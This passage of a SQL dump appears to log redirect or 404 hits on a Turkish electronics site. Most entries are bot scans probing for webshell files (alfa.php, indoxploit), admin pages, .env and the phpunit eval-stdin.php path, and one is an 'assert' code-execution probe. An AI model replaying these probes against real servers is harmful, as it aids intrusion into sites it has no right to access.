00:00:00',301),(27201,'http://3s-technologies.com.tr/tr/wp-admin/moderation.php',NULL,'http://3s-technologies.com.tr/wp-admin/moderation.php','',1,0,'2021-03-27 10:39:23','0000-00-00 00:00:00',301),(27202,'http://3s-technologies.com.tr/tr/wp-content/uploads/2021/01/ups.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2021/01/ups.php','',1,0,'2021-03-27 10:40:07','0000-00-00 00:00:00',301),(27203,'http://3s-technologies.com.tr/tr/wp-admin/options-media.php',NULL,'http://3s-technologies.com.tr/wp-admin/options-media.php','',1,0,'2021-03-27 10:51:01','0000-00-00 00:00:00',301),(27204,'http://3s-technologies.com.tr/tr/wp-admin/user/user-edit.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/user-edit.php','',1,0,'2021-03-27 11:07:05','0000-00-00 00:00:00',301),(27205,'http://3s-technologies.com.tr/tr/wp-admin/plugins.php',NULL,'http://3s-technologies.com.tr/wp-admin/plugins.php','',11,0,'2021-03-27 11:07:05','0000-00-00 00:00:00',301),(27206,'http://3s-technologies.com.tr/tr/wp-content/plugins/letme/weblinks.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/letme/weblinks.php','',3,0,'2021-03-27 11:07:40','0000-00-00 00:00:00',301),(27207,'http://3s-technologies.com.tr/tr/admin/controller/extension/module/doc.php',NULL,'http://3s-technologies.com.tr/admin/controller/extension/module/doc.php','',1,0,'2021-03-27 11:28:29','0000-00-00 00:00:00',301),(27208,'http://3s-technologies.com.tr/tr/wp-admin/options-general.php',NULL,'http://3s-technologies.com.tr/wp-admin/options-general.php','',1,0,'2021-03-27 11:31:39','0000-00-00 00:00:00',301),(27209,'http://3s-technologies.com.tr/tr/wp-content/uploads/chn.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/chn.php','',1,0,'2021-03-27 11:32:15','0000-00-00 00:00:00',301),(27210,'http://3s-technologies.com.tr/tr/wp-admin/ms-sites.php',NULL,'http://3s-technologies.com.tr/wp-admin/ms-sites.php','',1,0,'2021-03-27 12:02:00','0000-00-00 00:00:00',301),(27211,'http://3s-technologies.com.tr/tr/wp-content/themes/distance-lite/languages/pref.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/distance-lite/languages/pref.php','',1,0,'2021-03-27 12:14:10','0000-00-00 00:00:00',301),(27212,'http://3s-technologies.com.tr/tr/wp-admin/network/site-info.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/site-info.php','',1,0,'2021-03-27 12:29:54','0000-00-00 00:00:00',301),(27213,'http://3s-technologies.com.tr/tr/wp-admin/post.php',NULL,'http://3s-technologies.com.tr/wp-admin/post.php','',7,0,'2021-03-27 12:29:55','0000-00-00 00:00:00',301),(27214,'http://3s-technologies.com.tr/tr/wp-admin/ms-options.php',NULL,'http://3s-technologies.com.tr/wp-admin/ms-options.php','',1,0,'2021-03-27 12:35:24','0000-00-00 00:00:00',301),(27215,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordfence/modules/login-security/classes/model/wp-pingg.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wordfence/modules/login-security/classes/model/wp-pingg.php','',1,0,'2021-03-27 12:49:09','0000-00-00 00:00:00',301),(27216,'http://3s-technologies.com.tr/tr/wp-admin/my-sites.php',NULL,'http://3s-technologies.com.tr/wp-admin/my-sites.php','',1,0,'2021-03-27 12:51:01','0000-00-00 00:00:00',301),(27217,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/12/doc.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2020/12/doc.php','',1,0,'2021-03-27 13:08:23','0000-00-00 00:00:00',301),(27218,'http://3s-technologies.com.tr/tr/wp-admin/media-upload.php',NULL,'http://3s-technologies.com.tr/wp-admin/media-upload.php','',2,0,'2021-03-27 13:08:29','0000-00-00 00:00:00',301),(27219,'http://3s-technologies.com.tr/tr/wp-admin/tools.php',NULL,'http://3s-technologies.com.tr/wp-admin/tools.php','',16,0,'2021-03-27 13:27:31','0000-00-00 00:00:00',301),(27220,'http://3s-technologies.com.tr/tr/wp-admin/credits.php',NULL,'http://3s-technologies.com.tr/wp-admin/credits.php','',1,0,'2021-03-27 13:57:27','0000-00-00 00:00:00',301),(27221,'http://3s-technologies.com.tr/tr/wp-admin/network/edit.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/edit.php','',7,0,'2021-03-27 14:14:34','0000-00-00 00:00:00',301),(27222,'http://3s-technologies.com.tr/tr/wp-admin/theme-install.php',NULL,'http://3s-technologies.com.tr/wp-admin/theme-install.php','',1,0,'2021-03-27 14:30:28','0000-00-00 00:00:00',301),(27223,'http://3s-technologies.com.tr/tr/wp-admin/network/plugin-install.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/plugin-install.php','',1,0,'2021-03-27 14:43:01','0000-00-00 00:00:00',301),(27224,'http://3s-technologies.com.tr/tr/wp-admin/plugin-editor.php',NULL,'http://3s-technologies.com.tr/wp-admin/plugin-editor.php','',2,0,'2021-03-27 15:03:06','0000-00-00 00:00:00',301),(27225,'http://3s-technologies.com.tr/tr/wp-admin/edit-comments.php',NULL,'http://3s-technologies.com.tr/wp-admin/edit-comments.php','',1,0,'2021-03-27 16:02:59','0000-00-00 00:00:00',301),(27226,'http://3s-technologies.com.tr/tr/wp-admin/network/user-edit.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/user-edit.php','',1,0,'2021-03-27 16:21:30','0000-00-00 00:00:00',301),(27227,'http://3s-technologies.com.tr/tr/wp-admin/revision.php',NULL,'http://3s-technologies.com.tr/wp-admin/revision.php','',1,0,'2021-03-27 16:22:42','0000-00-00 00:00:00',301),(27228,'http://3s-technologies.com.tr/tr/wp-admin/admin-post.php',NULL,'http://3s-technologies.com.tr/wp-admin/admin-post.php','',34,0,'2021-03-27 16:58:46','0000-00-00 00:00:00',301),(27229,'http://3s-technologies.com.tr/tr/wp-content/themes/distance-lite/languages/longer.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/distance-lite/languages/longer.php','',1,0,'2021-03-27 16:59:01','0000-00-00 00:00:00',301),(27230,'http://3s-technologies.com.tr/tr/wp-admin/network/site-new.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/site-new.php','',1,0,'2021-03-27 17:32:54','0000-00-00 00:00:00',301),(27231,'http://3s-technologies.com.tr/tr/components/com_jce/views/index.php',NULL,'http://3s-technologies.com.tr/components/com_jce/views/index.php','',1,0,'2021-03-27 17:32:56','0000-00-00 00:00:00',301),(27232,'http://3s-technologies.com.tr/tr/components/com_allvideoshare/assets/js/wp-side.php',NULL,'http://3s-technologies.com.tr/components/com_allvideoshare/assets/js/wp-side.php','',2,0,'2021-03-27 17:33:03','0000-00-00 00:00:00',301),(27233,'http://3s-technologies.com.tr/tr/components/com_contact/pp1.php',NULL,'http://3s-technologies.com.tr/components/com_contact/pp1.php','',1,0,'2021-03-27 17:47:25','0000-00-00 00:00:00',301),(27234,'http://3s-technologies.com.tr/tr/components/com_ajax/ajax2.php',NULL,'http://3s-technologies.com.tr/components/com_ajax/ajax2.php','',1,0,'2021-03-27 18:03:05','0000-00-00 00:00:00',301),(27235,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/updates/mysql/gank.php.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_admin/sql/updates/mysql/gank.php.PhP','',1,0,'2021-03-27 18:04:08','0000-00-00 00:00:00',301),(27236,'http://3s-technologies.com.tr/tr/wp-admin/network/index.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/index.php','',205,0,'2021-03-27 18:20:58','0000-00-00 00:00:00',301),(27237,'http://3s-technologies.com.tr/tr/cgi-bin/x.php',NULL,'http://3s-technologies.com.tr/cgi-bin/x.php','',1,0,'2021-03-27 18:54:32','0000-00-00 00:00:00',301),(27238,'http://3s-technologies.com.tr/tr/components/com_phocaphoto/views/gank.php.php',NULL,'http://3s-technologies.com.tr/components/com_phocaphoto/views/gank.php.PhP','',1,0,'2021-03-27 19:11:31','0000-00-00 00:00:00',301),(27239,'http://3s-technologies.com.tr/tr/cache/minify.php.suspected',NULL,'http://3s-technologies.com.tr/cache/minify.php.suspected','',1,0,'2021-03-27 19:26:33','0000-00-00 00:00:00',301),(27240,'http://3s-technologies.com.tr/tr/administrator/components/com_finder/sql/languages.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_finder/sql/languages.php','',1,0,'2021-03-27 20:16:47','0000-00-00 00:00:00',301),(27241,'http://3s-technologies.com.tr/tr/components/com_foxcontact/home.php',NULL,'http://3s-technologies.com.tr/components/com_foxcontact/home.php','',1,0,'2021-03-27 20:17:17','0000-00-00 00:00:00',301),(27242,'http://3s-technologies.com.tr/tr/components/search.class.php',NULL,'http://3s-technologies.com.tr/components/search.class.php','',1,0,'2021-03-27 20:20:38','0000-00-00 00:00:00',301),(27243,'http://3s-technologies.com.tr/tr/wp-content/uploads/2021/01/doc.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2021/01/doc.php','',1,0,'2021-03-27 20:35:47','0000-00-00 00:00:00',301),(27244,'http://3s-technologies.com.tr/tr/audio/hello.php.suspected',NULL,'http://3s-technologies.com.tr/audio/hello.php.suspected','',1,0,'2021-03-27 21:24:13','0000-00-00 00:00:00',301),(27245,'http://3s-technologies.com.tr/tr/wp-admin/media-new.php',NULL,'http://3s-technologies.com.tr/wp-admin/media-new.php','',1,0,'2021-03-27 21:30:24','0000-00-00 00:00:00',301),(27246,'http://3s-technologies.com.tr/tr/administrator/components/com_categories/helpers/html/5e1779bfba97b.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_categories/helpers/html/5e1779bfba97b.php','',2,0,'2021-03-27 22:27:43','0000-00-00 00:00:00',301),(27247,'http://3s-technologies.com.tr/tr/wp-admin/network/site-users.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/site-users.php','',1,0,'2021-03-27 22:58:18','0000-00-00 00:00:00',301),(27248,'http://3s-technologies.com.tr/tr/wp-content/uploads/404.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/404.php','',3,0,'2021-03-27 23:01:00','0000-00-00 00:00:00',301),(27249,'http://3s-technologies.com.tr/tr/cache/jss.php',NULL,'http://3s-technologies.com.tr/cache/jss.php','',1,0,'2021-03-27 23:14:16','0000-00-00 00:00:00',301),(27250,'http://3s-technologies.com.tr/tr/components/up.php',NULL,'http://3s-technologies.com.tr/components/up.php','',1,0,'2021-03-27 23:18:08','0000-00-00 00:00:00',301),(27251,'http://3s-technologies.com.tr/tr/_install/template/css/kkooycj.php',NULL,'http://3s-technologies.com.tr/_install/template/css/kkooycj.php','',1,0,'2021-03-27 23:52:30','0000-00-00 00:00:00',301),(27252,'http://3s-technologies.com.tr/tr/__macosx/templates/beez3/html/com_weblinks/streamed.php',NULL,'http://3s-technologies.com.tr/__MACOSX/templates/beez3/html/com_weblinks/streamed.php','',1,0,'2021-03-28 00:03:34','0000-00-00 00:00:00',301),(27253,'http://3s-technologies.com.tr/tr/cache/jss.php.suspected',NULL,'http://3s-technologies.com.tr/cache/jss.php.suspected','',1,0,'2021-03-28 00:20:13','0000-00-00 00:00:00',301),(27254,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/12/ups.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2020/12/ups.php','',1,0,'2021-03-28 00:20:43','0000-00-00 00:00:00',301),(27255,'http://3s-technologies.com.tr/tr/administrator/components/com_wusers/wusers.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_wusers/wusers.php','',1,0,'2021-03-28 00:24:16','0000-00-00 00:00:00',301),(27256,'http://3s-technologies.com.tr/tr/components/logo_img.php.suspected',NULL,'http://3s-technologies.com.tr/components/logo_img.php.suspected','',1,0,'2021-03-28 00:24:45','0000-00-00 00:00:00',301),(27257,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/rlbkj2kd/content-post.php.suspected',NULL,'http://3s-technologies.com.tr/.well-known/acme-challenge/rlbkj2kd/content-post.php.suspected','',1,0,'2021-03-28 00:35:12','0000-00-00 00:00:00',301),(27258,'http://3s-technologies.com.tr/tr/wp-admin/edit-tags.php',NULL,'http://3s-technologies.com.tr/wp-admin/edit-tags.php','',4,0,'2021-03-28 00:36:31','0000-00-00 00:00:00',301),(27259,'https://3s-technologies.com.tr/tr/component/k2/item/17',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/17','',3,0,'2021-03-28 00:39:08','0000-00-00 00:00:00',301),(27260,'http://3s-technologies.com.tr/tr/components/com_finder/views/index.php',NULL,'http://3s-technologies.com.tr/components/com_finder/views/index.php','',1,0,'2021-03-28 00:59:24','0000-00-00 00:00:00',301),(27261,'https://3s-technologies.com.tr/tr/component/k2/item/18',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/18','',1,0,'2021-03-28 01:07:15','0000-00-00 00:00:00',301),(27262,'https://3s-technologies.com.tr/tr/component/k2/item/28',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/28','',1,0,'2021-03-28 01:30:16','0000-00-00 00:00:00',301),(27263,'http://3s-technologies.com.tr/tr/cgi-bin/systems.php',NULL,'http://3s-technologies.com.tr/cgi-bin/systems.php','',1,0,'2021-03-28 01:47:42','0000-00-00 00:00:00',301),(27264,'http://3s-technologies.com.tr/tr/wp-admin/network/credits.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/credits.php','',1,0,'2021-03-28 03:08:44','0000-00-00 00:00:00',301),(27265,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/controllers/images.php.suspected',NULL,'http://3s-technologies.com.tr/administrator/components/com_admin/controllers/images.php.suspected','',1,0,'2021-03-28 03:59:32','0000-00-00 00:00:00',301),(27266,'http://3s-technologies.com.tr/tr/administrator/modules/mod_multilangstatus/ngoc24ba.php',NULL,'http://3s-technologies.com.tr/administrator/modules/mod_multilangstatus/ngoc24ba.php','',1,0,'2021-03-28 04:11:50','0000-00-00 00:00:00',301),(27267,'http://3s-technologies.com.tr/tr/components/com_content/views/archive/tmpl/theme.php',NULL,'http://3s-technologies.com.tr/components/com_content/views/archive/tmpl/theme.php','',2,0,'2021-03-28 04:46:50','0000-00-00 00:00:00',301),(27268,'http://3s-technologies.com.tr/tr/-/code87/ijo.php',NULL,'http://3s-technologies.com.tr/-/code87/ijo.php','',1,0,'2021-03-28 05:02:21','0000-00-00 00:00:00',301),(27269,'https://3s-technologies.com.tr/tr/component/k2/item/9',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/9','',1,0,'2021-03-28 05:10:45','0000-00-00 00:00:00',301),(27270,'http://3s-technologies.com.tr/tr/ash.php',NULL,'http://3s-technologies.com.tr/ash.php','',1,0,'2021-03-28 05:18:22','0000-00-00 00:00:00',301),(27271,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_admin/profile/htaccess.php',NULL,'http://3s-technologies.com.tr/administrator/templates/hathor/html/com_admin/profile/htaccess.php','',2,0,'2021-03-28 05:22:50','0000-00-00 00:00:00',301),(27272,'http://3s-technologies.com.tr/tr/cache/error.php',NULL,'http://3s-technologies.com.tr/cache/error.php','',2,0,'2021-03-28 05:52:47','0000-00-00 00:00:00',301),(27273,'http://3s-technologies.com.tr/tr/wp-admin/user/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/admin.php','',45,0,'2021-03-28 06:07:46','0000-00-00 00:00:00',301),(27274,'https://3s-technologies.com.tr/tr/component/k2/item/30',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/30','',2,0,'2021-03-28 07:11:21','0000-00-00 00:00:00',301),(27275,'http://3s-technologies.com.tr/tr/wp-admin/network/setup.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/setup.php','',1,0,'2021-03-28 07:52:35','0000-00-00 00:00:00',301),(27276,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/wp-tinymce.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/wp-tinymce.php','',6,0,'2021-03-28 08:03:07','0000-00-00 00:00:00',301),(27277,'https://3s-technologies.com.tr/en//2018/wp-includes/wlwmanifest.xml',NULL,'','',253,0,'2021-03-28 08:42:17','0000-00-00 00:00:00',301),(27278,'https://3s-technologies.com.tr/en//media/wp-includes/wlwmanifest.xml',NULL,'','',254,0,'2021-03-28 08:42:24','0000-00-00 00:00:00',301),(27279,'http://3s-technologies.com.tr/tr/administrator/v3.php',NULL,'http://3s-technologies.com.tr/administrator/v3.php','',1,0,'2021-03-28 09:09:24','0000-00-00 00:00:00',301),(27280,'https://3s-technologies.com.tr/tr/component/k2/item/24',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/24','',2,0,'2021-03-28 10:01:12','0000-00-00 00:00:00',301),(27281,'http://3s-technologies.com.tr/tr/class-wp-widget-archives.php.suspected',NULL,'http://3s-technologies.com.tr/class-wp-widget-archives.php.suspected','',1,0,'2021-03-28 10:55:49','0000-00-00 00:00:00',301),(27282,'https://3s-technologies.com.tr/tr/component/k2/item/21',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/21','',1,0,'2021-03-28 12:18:08','0000-00-00 00:00:00',301),(27283,'http://3s-technologies.com.tr/tr/alfa.php.suspected',NULL,'http://3s-technologies.com.tr/alfa.php.suspected','',1,0,'2021-03-28 12:55:11','0000-00-00 00:00:00',301),(27284,'http://3s-technologies.com.tr/tr/components/com_contact/views/index.php',NULL,'http://3s-technologies.com.tr/components/com_contact/views/index.php','',1,0,'2021-03-28 12:55:46','0000-00-00 00:00:00',301),(27285,'https://3s-technologies.com.tr/tr/component/k2/item/27',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/27','',1,0,'2021-03-28 13:33:12','0000-00-00 00:00:00',301),(27286,'http://3s-technologies.com.tr/tr/wp-admin/freedoms.php',NULL,'http://3s-technologies.com.tr/wp-admin/freedoms.php','',1,0,'2021-03-28 13:59:51','0000-00-00 00:00:00',301),(27287,'http://3s-technologies.com.tr/tr/ableism/popup-pomo.php',NULL,'http://3s-technologies.com.tr/ableism/popup-pomo.php','',1,0,'2021-03-28 14:06:28','0000-00-00 00:00:00',301),(27288,'https://3s-technologies.com.tr/tr/component/k2/item/22',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/22','',1,0,'2021-03-28 15:13:11','0000-00-00 00:00:00',301),(27289,'http://3s-technologies.com.tr/tr/components/com_allvideoshare/views/videos/.h..php',NULL,'http://3s-technologies.com.tr/components/com_allvideoshare/views/videos/.h..php','',2,0,'2021-03-28 16:39:59','0000-00-00 00:00:00',301),(27290,'http://3s-technologies.com.tr/tr/administrator/components/com_frontpage/io.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_frontpage/io.php','',1,0,'2021-03-28 17:30:51','0000-00-00 00:00:00',301),(27291,'http://3s-technologies.com.tr/tr/components/com_foxcontact/f.php',NULL,'http://3s-technologies.com.tr/components/com_foxcontact/f.php','',1,0,'2021-03-28 17:33:30','0000-00-00 00:00:00',301),(27292,'http://3s-technologies.com.tr/tr/components/com_foxcontact/indoxploit_fistsb.php',NULL,'http://3s-technologies.com.tr/components/com_foxcontact/indoxploit_fIsTsb.php','',1,0,'2021-03-28 18:02:43','0000-00-00 00:00:00',301),(27293,'http://3s-technologies.com.tr/tr/dup-installer/main.installer.php',NULL,'','',10,0,'2021-03-28 19:11:47','0000-00-00 00:00:00',301),(27294,'http://3s-technologies.com.tr/tr/-/~/code87/ijo.php',NULL,'http://3s-technologies.com.tr/-/~/code87/ijo.php','',1,0,'2021-03-28 20:58:30','0000-00-00 00:00:00',301),(27295,'http://3s-technologies.com.tr/tr/87/ijo.php',NULL,'http://3s-technologies.com.tr/87/ijo.php','',1,0,'2021-03-29 02:22:46','0000-00-00 00:00:00',301),(27296,'http://3s-technologies.com.tr/tr/wp-admin/network/upgrade.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/upgrade.php','',1,0,'2021-03-29 06:33:44','0000-00-00 00:00:00',301),(27297,'https://3s-technologies.com.tr/tr/?option=com_easyblog&view=dashboard&layout=write',NULL,'https://3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',170,0,'2021-03-29 10:08:06','0000-00-00 00:00:00',301),(27298,'http://3s-technologies.com.tr/tr/baf77541e756.php',NULL,'http://3s-technologies.com.tr/BAF77541E756.php','',1,0,'2021-03-29 18:26:06','0000-00-00 00:00:00',301),(27299,'http://3s-technologies.com.tr/tr/bitrix/templates/.default/ajax/images/ups.php',NULL,'http://3s-technologies.com.tr/bitrix/templates/.default/ajax/images/ups.php','',1,0,'2021-03-29 18:26:33','0000-00-00 00:00:00',301),(27300,'http://3s-technologies.com.tr/tr/bitrix/templates/.default/ajax/images/img.php',NULL,'http://3s-technologies.com.tr/bitrix/templates/.default/ajax/images/img.php','',1,0,'2021-03-29 18:41:31','0000-00-00 00:00:00',301),(27301,'http://3s-technologies.com.tr/tr/cender.php',NULL,'http://3s-technologies.com.tr/cender.php','',1,0,'2021-03-29 18:41:43','0000-00-00 00:00:00',301),(27302,'http://3s-technologies.com.tr/tr/sites/default/files/ups.php',NULL,'http://3s-technologies.com.tr/sites/default/files/ups.php','',1,0,'2021-03-29 18:41:54','0000-00-00 00:00:00',301),(27303,'http://3s-technologies.com.tr/tr/conn.php',NULL,'http://3s-technologies.com.tr/Conn.php','',6,0,'2021-03-29 18:57:30','0000-00-00 00:00:00',301),(27304,'http://3s-technologies.com.tr/tr/admin/language/en-gb/extension/extension/doc.php',NULL,'http://3s-technologies.com.tr/admin/language/en-gb/extension/extension/doc.php','',1,0,'2021-03-29 18:57:59','0000-00-00 00:00:00',301),(27305,'http://3s-technologies.com.tr/tr/sites/all/themes/hatch/templates/wp-plugins.php',NULL,'http://3s-technologies.com.tr/sites/all/themes/hatch/templates/wp-plugins.php','',1,0,'2021-03-29 19:15:22','0000-00-00 00:00:00',301),(27306,'http://3s-technologies.com.tr/tr/admin/controller/extension/module/baf77541e756.php',NULL,'http://3s-technologies.com.tr/admin/controller/extension/module/BAF77541E756.php','',1,0,'2021-03-29 20:02:36','0000-00-00 00:00:00',301),(27307,'http://3s-technologies.com.tr/tr/cache/zupxxw.php',NULL,'http://3s-technologies.com.tr/cache/zupxxw.php','',1,0,'2021-03-29 20:02:46','0000-00-00 00:00:00',301),(27308,'http://3s-technologies.com.tr/tr/admin/controller/extension/module/simple.php',NULL,'http://3s-technologies.com.tr/admin/controller/extension/module/simple.php','',1,0,'2021-03-29 20:03:37','0000-00-00 00:00:00',301),(27309,'http://3s-technologies.com.tr/tr/retister.php',NULL,'http://3s-technologies.com.tr/retister.php','',3,0,'2021-03-29 20:04:45','0000-00-00 00:00:00',301),(27310,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',7,0,'2021-03-29 21:47:39','0000-00-00 00:00:00',301),(27311,'http://3s-technologies.com.tr/tr/zname.php',NULL,'http://3s-technologies.com.tr/zname.php','',1,0,'2021-03-30 01:18:36','0000-00-00 00:00:00',301),(27312,'http://3s-technologies.com.tr/tr/sites/all/themes/hatch/templates/doc.php',NULL,'http://3s-technologies.com.tr/sites/all/themes/hatch/templates/doc.php','',1,0,'2021-03-30 01:33:58','0000-00-00 00:00:00',301),(27313,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/views/showlists/tmpl/htaccess.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_imageshow/views/showlists/tmpl/htaccess.php','',1,0,'2021-03-30 01:49:47','0000-00-00 00:00:00',301),(27314,'http://3s-technologies.com.tr/tr/bitrix/templates/.default/ajax/images/doc.php',NULL,'http://3s-technologies.com.tr/bitrix/templates/.default/ajax/images/doc.php','',1,0,'2021-03-30 02:23:21','0000-00-00 00:00:00',301),(27315,'http://3s-technologies.com.tr/tr/sites/all/themes/hatch/wp-plugins.php',NULL,'http://3s-technologies.com.tr/sites/all/themes/hatch/wp-plugins.php','',1,0,'2021-03-30 02:58:17','0000-00-00 00:00:00',301),(27316,'http://3s-technologies.com.tr/tr/sites/all/themes/hatch/ups.php',NULL,'http://3s-technologies.com.tr/sites/all/themes/hatch/ups.php','',1,0,'2021-03-30 05:57:08','0000-00-00 00:00:00',301),(27317,'http://3s-technologies.com.tr/tr/sites/all/themes/hatch/content-post.php',NULL,'http://3s-technologies.com.tr/sites/all/themes/hatch/content-post.php','',2,0,'2021-03-30 06:13:14','0000-00-00 00:00:00',301),(27318,'http://3s-technologies.com.tr/tr/sites/default/files/wp-plugins.php',NULL,'http://3s-technologies.com.tr/sites/default/files/wp-plugins.php','',1,0,'2021-03-30 06:14:07','0000-00-00 00:00:00',301),(27319,'http://3s-technologies.com.tr/tr/confg.php',NULL,'http://3s-technologies.com.tr/confg.php','',1,0,'2021-03-30 06:14:45','0000-00-00 00:00:00',301),(27320,'http://3s-technologies.com.tr/tr/bitrix/templates/print/lang/en/en.php',NULL,'http://3s-technologies.com.tr/bitrix/templates/print/lang/en/en.php','',1,0,'2021-03-30 06:15:29','0000-00-00 00:00:00',301),(27321,'http://3s-technologies.com.tr/tr/admin/view/stylesheet/doc.php',NULL,'http://3s-technologies.com.tr/admin/view/stylesheet/doc.php','',1,0,'2021-03-30 06:31:15','0000-00-00 00:00:00',301),(27322,'http://3s-technologies.com.tr/en/fckeditor/editor/filemanager/browser/default/frmupload.html',NULL,'','',1,0,'2021-03-30 10:16:38','0000-00-00 00:00:00',301),(27323,'https://3s-technologies.com.tr/tr/.env',NULL,'','',189,0,'2021-03-30 12:16:14','0000-00-00 00:00:00',301),(27324,'https://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',12,0,'2021-03-30 12:17:10','0000-00-00 00:00:00',301),(27325,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/slideshow/80-sp18_av3.jpg',NULL,'','',5,0,'2021-03-31 17:03:32','0000-00-00 00:00:00',301),(27326,'http://3s-technologies.com.tr/en/_ignition/health-check',NULL,'http://3s-technologies.com.tr/_ignition/health-check/','',5,0,'2021-03-31 20:00:41','0000-00-00 00:00:00',301),(27327,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,ordering',NULL,'','',565,0,'2021-04-01 00:24:38','0000-00-00 00:00:00',301),(27328,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_name',NULL,'','',558,0,'2021-04-01 00:24:58','0000-00-00 00:00:00',301),(27329,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_name/dirdesc',NULL,'','',552,0,'2021-04-01 00:25:03','0000-00-00 00:00:00',301),(27330,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_sku',NULL,'','',561,0,'2021-04-01 00:25:19','0000-00-00 00:00:00',301),(27331,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/dirdesc',NULL,'','',569,0,'2021-04-01 00:25:28','0000-00-00 00:00:00',301),(27332,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,mf_name',NULL,'','',589,0,'2021-04-01 00:26:45','0000-00-00 00:00:00',301),(27333,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,ordering',NULL,'','',589,0,'2021-04-01 00:27:09','0000-00-00 00:00:00',301),(27334,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_name',NULL,'','',594,0,'2021-04-01 00:27:20','0000-00-00 00:00:00',301),(27335,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_name/dirdesc',NULL,'','',597,0,'2021-04-01 00:27:26','0000-00-00 00:00:00',301),(27336,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,product_sku',NULL,'','',634,0,'2021-04-01 00:29:32','0000-00-00 00:00:00',301),(27337,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/dirdesc',NULL,'','',629,0,'2021-04-01 00:29:42','0000-00-00 00:00:00',301),(27338,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±',NULL,'','',604,0,'2021-04-01 00:29:57','0000-00-00 00:00:00',301),(27339,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,`p`.product_sku',NULL,'','',622,0,'2021-04-01 00:30:04','0000-00-00 00:00:00',301),(27340,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,`p`.product_sku/dirdesc',NULL,'','',590,0,'2021-04-01 00:30:09','0000-00-00 00:00:00',301),(27341,'http://3s-technologies.com.tr/en/kcfinder/browse.php',NULL,'','',1,0,'2021-04-01 08:04:33','0000-00-00 00:00:00',301),(27342,'http://www.3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2021-04-02 19:30:42','0000-00-00 00:00:00',301),(27343,'https://3s-technologies.com.tr/en/modules/mod_feed/tmpl/mod_feed.php?ms-load=yjk5hg',NULL,'','',1,0,'2021-04-02 22:44:29','0000-00-00 00:00:00',301),(27344,'https://3s-technologies.com.tr/en/media/media.php?1=assert&2=die(pi()*42);',NULL,'','',1,0,'2021-04-03 13:23:12','0000-00-00 00:00:00',301),(27345,'http://www.3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing',NULL,'','',2,0,'2021-04-03 